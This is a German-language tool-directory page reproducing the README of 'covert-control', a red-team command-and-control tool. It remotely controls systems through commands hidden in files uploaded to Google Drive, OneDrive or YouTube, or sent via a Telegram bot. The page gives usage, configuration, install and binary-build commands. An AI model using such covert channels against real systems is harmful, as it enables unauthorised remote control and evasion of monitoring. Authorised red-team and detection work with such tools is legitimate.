Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ricardojoserf/covert-control
Verschlüsselungs-/EntschlüsselungstoolsDatenexfiltrationPost-ExploitationCommand and ControlRed Teaming
GitHubricardojoserf/covert-control

covert-control

Google Drive, OneDrive und Youtube als verdeckte Kanäle - Systeme fernsteuern, indem man Dateien auf Google Drive, OneDrive, Youtube oder Telegram hochlädt

Repository anzeigen
718vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

covert-control

Steuern Sie Systeme remote, indem Sie Dateien in Google Drive, OneDrive, YouTube oder Telegram hochladen, wobei Python verwendet wird, um die Dateien und die Listener zu erstellen. Es ermöglicht das Erstellen von Textdateien, Bildern, Audio oder Videos mit den Befehlen im Klartext oder verschlüsselt mit AES.

  • covert-googledrive.py - Steuern Sie Systeme durch Hochladen von Dateien in einen öffentlichen Ordner in Google Drive.

  • covert-onedrive.py - Steuern Sie Systeme durch Hochladen von Dateien in einen öffentlichen Ordner in OneDrive.

  • covert-youtube.py - Steuern Sie Systeme durch Hochladen von Videos auf Youtube (aktualisiert von covert-tube).

  • covert-telegram.py - Steuern Sie Systeme mit einem Telegram-Bot.

Dateien zum Hochladen erstellen

Beispieldateien finden Sie im Ordner test_files oder erstellen Sie neue mit generate_file.py:

root@kitploit:~
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
  • -t (--type) [Erforderlich]: Dateitypen: "text", "image", "audio" oder "video".

  • -o (--outputfile) [Optional]: Ausgabedatei.

  • -c (--command) [Optional]: Auszuführender Befehl.

  • -e (--encrypted) [Optional]: Fügen Sie dieses Flag hinzu, um den Befehl mit AES zu verschlüsseln.

Beispiele:

root@kitploit:~
python3 generate_file.py -t text  -c "whoami" -o text.txt
python3 generate_file.py -t text  -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e

Konfiguration

Allgemeine Konfigurationswerte:

  • data_type (Optional. Standard: "text"):

Spezifische Konfigurationswerte:

  • googledrive_folder: URL des öffentlichen Google Drive-Ordners, der überwacht werden soll (für covert-googledrive.py).

  • onedrive_folder: URL des öffentlichen OneDrive-Ordners, der überwacht werden soll (für covert-onedrive.py).

  • youtube_channel_id: YouTube-Kanal-ID des zu überwachenden Kanals. Sie können sie von hier abrufen (für covert-youtube.py).

  • youtube_api_key: Erhalten Sie einen API-Schlüssel, indem Sie eine Anwendung erstellen und den Schlüssel hier generieren (für covert-youtube.py).

  • telegram_token: Bot-Token, erstellen Sie es mit BotFather. Schreiben Sie "/newbot", senden Sie dann einen Namen für den Bot (z.B. "botname") und einen Benutzernamen für den Bot, der auf "-bot" endet (z.B. "somethingrandombot") (für covert-telegram.py).

  • telegram_username: Geben Sie einen Telegram-Benutzernamen an, sodass nur Befehle von diesem Benutzer ausgeführt werden (ohne "@").


Google Drive

Es ermöglicht das Ausführen von Befehlen durch Hochladen von Textdateien, Bildern, Audio und Videos, unverschlüsselt oder mit AES verschlüsselt. Das optionale Eingabeargument ist die URL des öffentlichen Ordners, die auch in config.py konfiguriert werden kann:

root@kitploit:~
python3 covert-googledrive.py [FOLDER_URL]

Der Listener überprüft den Google Drive-Ordner standardmäßig alle 300 Sekunden (kann in config.py aktualisiert werden). In diesem Fall wird ein Video "video.avi" hochgeladen, mit dem Befehl im QR-Code des Videos:

img1

Nachdem festgestellt wurde, dass eine neue Datei in den Ordner hochgeladen wurde, wird sie heruntergeladen, verarbeitet und die Befehle werden ausgeführt:

img2


Onedrive

Es ermöglicht das Ausführen von Befehlen durch Hochladen von Textdateien, Bildern, Audio und Videos, unverschlüsselt oder mit AES verschlüsselt. Das optionale Eingabeargument ist die URL des öffentlichen Ordners, die auch in config.py konfiguriert werden kann:

root@kitploit:~
python3 covert-onedrive.py [FOLDER_URL]

Der Listener überprüft den OneDrive-Ordner standardmäßig alle 300 Sekunden (kann in config.py aktualisiert werden). In diesem Fall wird eine Audiodatei "audio_encrypted.wav" hochgeladen, mit dem mit AES verschlüsselten Befehl:

img3

Nachdem festgestellt wurde, dass eine neue Datei in den Ordner hochgeladen wurde, wird sie heruntergeladen, verarbeitet und die Befehle werden ausgeführt:

img4

HINWEIS: Dies funktioniert nur, wenn Sie keine Datei im Ordner löschen. Wenn Sie dies tun, müssen Sie einen neuen erstellen. Es wäre möglich, es so zu implementieren, dass es auch nach dem Löschen von Dateien funktioniert, aber es wäre notwendig, viele Anfragen zu erstellen und wäre weniger verdeckt.


Youtube

Es ermöglicht das Ausführen von Befehlen durch Hochladen von Videos, unverschlüsselt oder mit AES verschlüsselt. Die optionalen Eingabeargumente sind die YouTube-Kanal-ID und der API-Schlüssel, die auch in config.py konfiguriert werden können:

root@kitploit:~
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]

Der Listener überprüft den YouTube-Kanal standardmäßig alle 300 Sekunden (kann in config.py aktualisiert werden). Zunächst wird das Video hochgeladen:

img5

Nachdem festgestellt wurde, dass ein neues Video im Kanal vorhanden ist, wird es heruntergeladen, verarbeitet und die Befehle werden ausgeführt:

img6


Telegram

Steuern Sie Systeme remote mit einem Telegram-Bot. Diese Option erlaubt kein Hochladen von Dateien, aber es ist möglich, die Befehle im Klartext ("/cmd") oder mit AES verschlüsselt ("/encrypted") zu senden. Das erste optionale Eingabeargument ist der Bot-Token, der auch in config.py konfiguriert werden kann; das zweite dient zur Konfiguration eines einzelnen Telegram-Benutzers, der Befehle an den Bot senden kann (ohne "@"):

root@kitploit:~
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]

Der Listener überprüft die Befehle im Chat und zeigt die Ausgabe an:

root@kitploit:~
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

img7


Installation

root@kitploit:~
sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/

Erstellen eigenständiger Binärdateien

root@kitploit:~
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
Tool herunterladen
data_typeDateitypVerschlüsseltGültig fürErweiterung
textTextdateiNeinGoogle Drive, OneDrive.txt
text_encryptedTextdateiJaGoogle Drive, OneDrive.txt
imageBildNeinGoogle Drive, OneDrive.png
image_encryptedBildJaGoogle Drive, OneDrive.png
audioAudioNeinGoogle Drive, OneDrive.wav
audio_encryptedAudioJaGoogle Drive, OneDrive.wav
videoVideoNeinGoogle Drive, OneDrive, Youtube.avi
video_encryptedVideoJaGoogle Drive, OneDrive, Youtube.avi
  • delay_seconds (Optional. Standard: 300): Sekunden zwischen den Überprüfungen auf neu hochgeladene Dateien in den Google Drive- oder OneDrive-Ordnern oder neue Videos im YouTube-Kanal.

  • aes_key (Optional. Standard: "covert-control21"): Schlüssel für die AES-Verschlüsselung.

  • debug (Optional. Standard: True): Nachrichten und Zeitstempel im Listener ausgeben oder nicht.